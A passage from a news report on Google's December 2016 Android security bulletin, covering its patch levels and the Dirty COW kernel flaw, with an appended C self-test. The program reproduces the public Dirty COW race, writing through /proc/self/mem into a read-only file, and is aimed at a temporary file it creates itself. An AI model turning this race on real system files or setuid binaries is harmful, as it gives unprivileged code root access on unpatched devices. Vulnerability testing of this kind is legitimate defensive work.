Specifically, Google’s December 2016 Android security bulletin defines two security patch levels, each carrying fixes for Google’s own devices as well as for other manufacturers’ Android devices.
The 2016-12-01 security patch level includes 5 fixes for vulnerabilities rated “high” severity and 6 for moderate issues: two remote code execution flaws (one in the bundled curl/libcurl library, covered by CVE-2016-5419, CVE-2016-5420 and CVE-2016-5421, and one tracked as CVE-2016-6768), two denial of service vulnerabilities, five elevation of privilege vulnerabilities, and two information disclosure holes.
Devices already running Android 7.0 or later with the latest updates are not affected by these issues; every other release still on the market, from 4.4.4 through 6.0.1, is covered by the fixes.
Then there is the 2016-12-05 security patch level, which brings a larger set of fixes: 58 patches in total, 11 rated critical, 33 high and 14 moderate.
Most of the vulnerabilities fixed at this level are elevation of privilege flaws, and Google says both its own devices and other manufacturers’ phones and tablets are exposed. Once again, every device on Android 4.4.4 or later should install the patches as soon as possible.
The headline entry covers two flaws in the kernel memory subsystem, CVE-2016-4794 (a separate use-after-free in the kernel’s percpu allocator) and CVE-2016-5195, the Dirty COW bug discovered in the Linux kernel that also affects Android. Dirty COW is a race condition in the handling of private, read-only copy-on-write mappings that lets an unprivileged local process write to files it is only allowed to read, setuid binaries included, which is enough to gain root on the device and full access to local data. Google rates the entry Critical and ships the fix to its own devices, including the Pixel C, Pixel, Pixel XL, Nexus 5X and Nexus 6P.
“An elevation of privilege vulnerability in the kernel memory subsystem could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device,” Google says.
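As an added example that is not part of the original article or of Google’s bulletin, the following C program is a self-test for the Dirty COW race in the shape of the publicly released proof of concept: one thread writes through /proc/self/mem into a private, read-only mapping of a file the process cannot open for writing, while a second thread keeps discarding the private copy-on-write page with madvise(MADV_DONTNEED). On an unpatched kernel the write eventually lands in the page cache and the file itself changes; on a patched kernel the file stays intact. It assumes a Linux or Android kernel, a writable temporary directory (TMPDIR or /tmp) and that /proc/self/mem is writable by the process itself, which is normal on stock kernels; where a sandbox denies it, the program reports the result as undetermined rather than vulnerable. The file name, iteration count and payload are this example’s own choices.

```c
/* Added example (not from the article or from Google): Dirty COW
 * (CVE-2016-5195) self-test modelled on the public proof of concept.
 * Build on Linux, or with the Android NDK for use from adb shell:
 *   cc -O2 -pthread dirtycow_check.c -o dirtycow_check
 */
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* The public PoC looped 100 million times; this keeps a quick run to a few
 * seconds. Raise it for a more thorough test of a suspect kernel. */
#define ITERATIONS 200000

static const char original[] = "read-only contents that must not change\n";
static const char payload[]  = "DIRTYCOW";   /* constructed test payload */

struct race_ctx {
    void *map;            /* read-only MAP_PRIVATE mapping of the file */
    int mem_fd;           /* /proc/self/mem */
    volatile int stop;    /* set by the writer when it is done */
    int write_failed;     /* /proc/self/mem refused the write (sandboxed) */
};

/* Discarding the private COW copy between the kernel's two page lookups is
 * what the original race relied on; on a patched kernel it only refaults. */
static void *madvise_thread(void *arg)
{
    struct race_ctx *c = arg;
    while (!c->stop)
        madvise(c->map, sizeof original, MADV_DONTNEED);
    return NULL;
}

/* /proc/<pid>/mem is addressed by virtual address; the kernel uses FOLL_FORCE
 * here, so the write is allowed to break COW on a read-only mapping. That is
 * the code path the bug lived in. */
static void *write_thread(void *arg)
{
    struct race_ctx *c = arg;
    for (int i = 0; i < ITERATIONS; i++) {
        if (pwrite(c->mem_fd, payload, sizeof payload - 1,
                   (off_t)(uintptr_t)c->map) != (ssize_t)(sizeof payload - 1)) {
            c->write_failed = 1;
            break;
        }
    }
    c->stop = 1;
    return NULL;
}

/* Returns 1 if the on-disk file changed (kernel vulnerable), 0 if it stayed
 * intact, -1 if the race could not be run in this environment. */
int dirty_cow_check(void)
{
    const char *dir = getenv("TMPDIR");           /* Android has no /tmp */
    char path[4096];
    snprintf(path, sizeof path, "%s/dirtycow_XXXXXX", dir ? dir : "/tmp");

    int fd = mkstemp(path);
    if (fd < 0) return -1;
    if (write(fd, original, sizeof original) != (ssize_t)sizeof original ||
        fchmod(fd, 0444) < 0) {              /* honest open(O_WRONLY) now fails */
        close(fd); unlink(path); return -1;
    }
    close(fd);

    int result = -1;
    fd = open(path, O_RDONLY);
    if (fd < 0) { unlink(path); return -1; }
    void *map = mmap(NULL, sizeof original, PROT_READ, MAP_PRIVATE, fd, 0);
    int mem_fd = open("/proc/self/mem", O_RDWR);
    if (map != MAP_FAILED && mem_fd >= 0) {
        struct race_ctx c = { map, mem_fd, 0, 0 };
        pthread_t madviser, writer;
        if (pthread_create(&madviser, NULL, madvise_thread, &c) == 0) {
            int ran = pthread_create(&writer, NULL, write_thread, &c) == 0;
            if (ran) pthread_join(writer, NULL);
            c.stop = 1;                      /* also covers a failed writer start */
            pthread_join(madviser, NULL);

            /* Judge by the file, not the mapping: the private copy may
             * legitimately show the payload, the file must not. */
            char buf[sizeof original] = {0};
            ssize_t n = pread(fd, buf, sizeof original, 0);
            if (n != (ssize_t)sizeof original ||
                memcmp(buf, original, sizeof original) != 0)
                result = 1;
            else if (ran && !c.write_failed)
                result = 0;
        }
    }
    if (map != MAP_FAILED) munmap(map, sizeof original);
    if (mem_fd >= 0) close(mem_fd);
    close(fd);
    unlink(path);
    return result;
}

int main(void)
{
    int r = dirty_cow_check();
    if (r == 1)      puts("VULNERABLE: read-only file was modified through the COW race");
    else if (r == 0) puts("not vulnerable: file unchanged after the race");
    else             puts("undetermined: could not run the race here (is /proc/self/mem writable?)");
    return r == 1 ? 2 : 0;
}
```

The check reads the file back through the file descriptor rather than through the mapping, because a write via /proc/self/mem is allowed to land in the process’s private copy even on a fixed kernel; only a change visible to other readers of the file demonstrates the bug. A single run can miss the race on a vulnerable kernel, so a clean result with the default iteration count is weaker evidence than the patch level itself.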
Canonical has already patched the flaw in supported Ubuntu releases, and with this month’s Google patch cycle the company’s own devices are covered as well. Other Android devices are protected only once their manufacturer ships a build carrying the 2016-12-05 security patch level, which depends on each vendor’s update schedule.
Devices receiving the update get a single OTA package, after which the About screen reports the December 5, 2016 security patch level. To confirm a device is patched, check Settings > About phone > Android security patch level, or from a connected host run adb shell getprop ro.build.version.security_patch, which should print 2016-12-05 or a later date.